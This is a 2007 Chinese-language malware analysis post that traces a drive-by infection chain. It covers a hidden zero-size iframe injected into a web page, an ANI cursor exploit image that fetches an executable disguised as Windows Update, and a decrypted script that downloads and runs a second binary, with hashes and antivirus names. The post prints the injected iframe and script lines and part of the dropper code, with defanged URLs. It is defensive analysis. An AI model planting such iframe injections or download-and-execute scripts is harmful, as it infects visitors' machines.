endurer 原创
2007-06-13 第1版
Kaspersky 报告:
/---
已检测到: 木马程序 Trojan-Downloader.JS.Agent.ht 脚本: hxxp://www.a*b***c.cn/system/login.asp?Type=logout[2]
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.aj URL: hxxp://www.i*f5*6***.cn/ad.jpg
---/
检查网页源文件,发现ARP病毒自动加入代码:
/---
<iframe src=hxxp://1**23*4.89***1*11.cn/woyao.htm width=0 height=0></iframe>
---/
woyao.htm 包含代码:
/---
<iframe src=hxxp://1**23*4.89***1*11.cn/woyao.htm width=0 height=0></iframe>
<BODY style='CURSOR: url(hxxp://www.i*f5*6***.cn/ad.jpg)'></BODY>
<script src=hxxp://1**23*4.89***1*11.cn/c.js></script>
---/
ad.jpg 利用 ANI 漏洞下载 hxxp://down**.i*f5*6***.cn/abc.exe
文件说明符 : D:/test/abc.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.0.2900.2180
说明 : Windows Update
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
产品名称 : update.exe
公司名称 : Microsoft(R) Windows(R) Operating System
合法商标 : Microsoft Corporation
内部名称 : update
源文件名 : update
创建时间 : 2007-6-12 13:40:43
修改时间 : 2007-6-12 13:40:43
访问时间 : 2007-6-12 13:41:59
大小 : 57856 字节 56.512 KB
MD5 : 5d6a5ef75041378e3f375b04e89ab576
Kaspersky 报为 Virus.Win32.AutoRun.bx
hxxp://1**23*4.89***1*11.cn/c.js 经过3次解密,得到JavaScript代码,功能是利用Microsoft.XMLHTTP、Adodb.Stream和Scripting.FileSystemObject 下载文件hxxp://down*3*.i*f5*6***.cn/avp.exe,保存到%windir%,文件名由
/---
function Ks(vpn)
{
var Num = Math.random()*vpn;
return '~Temp'+Math.round(Num)+'.tmp';
}
……
NAmeA=Ks(1111);
---/
生成,即~Temp****.tmp,其中*为数字,然后通过Shell.Application对象yq的方法shellExecute执行命令:%windir%/system32/cmd.exe /c %windir%/~Temp****.tmp,"","open",0来启动。
文件说明符 : D:/test/avp.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-12 17:0:37
修改时间 : 2007-6-12 17:1:18
访问时间 : 2007-6-12 17:3:19
大小 : 16431 字节 16.47 KB
MD5 : d48b11b949457ea6b403b8700f494625
Kaspersky 报为 Virus.Win32.AutoRun.bv
瑞星报为未知病毒